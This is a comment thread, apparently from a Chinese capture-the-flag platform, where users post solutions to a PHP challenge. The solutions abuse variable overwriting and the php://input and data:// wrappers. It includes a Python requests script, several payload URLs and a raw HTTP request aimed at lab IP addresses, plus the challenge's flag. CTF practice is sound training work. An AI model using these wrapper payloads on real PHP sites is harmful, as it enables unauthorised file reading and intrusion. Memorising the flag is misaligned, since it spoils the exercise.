2324291123 @ 2024-05-19 23:20:55 👍0
import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)
一路奔腾 @ 2024-02-07 23:20:55 👍0
file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/
steve07222 @ 2023-08-07 23:20:55 👍1
http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1
wxy1343 @ 2023-06-07 23:20:55 👍0
http://114.67.175.224:15664/?ac=1&fn=data:,1
wxy1343 @ 2023-06-07 23:20:55 👍0
flag{6fccd47ef5e5988f1e2c4989bf554614}
你比大葱更美丽 @ 2023-06-07 23:20:55 👍0
用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的
Striker123456 @ 2023-06-07 23:20:55 👍0
简简单单的变量覆盖
Striker123456 @ 2023-06-07 23:20:55 👍0
@J_0k3r 没有extract的$fn就不可控了
J_0k3r @ 2023-06-07 23:20:55 👍1
不是文件包含吗QAQ,跟变量覆盖有什么关系
zdfy005 @ 2023-06-07 23:20:55 👍0
POST /?ac=flag&fn=php://input HTTP/1.1 删除Content-Type: POST flag
wjwjwjwcwcwc @ 2023-06-07 23:20:55 👍0
http://114.67.175.224:18854/?ac=1&fn=php://input hackbar中post赋值1
?&ac=bugku&fn=flag.txt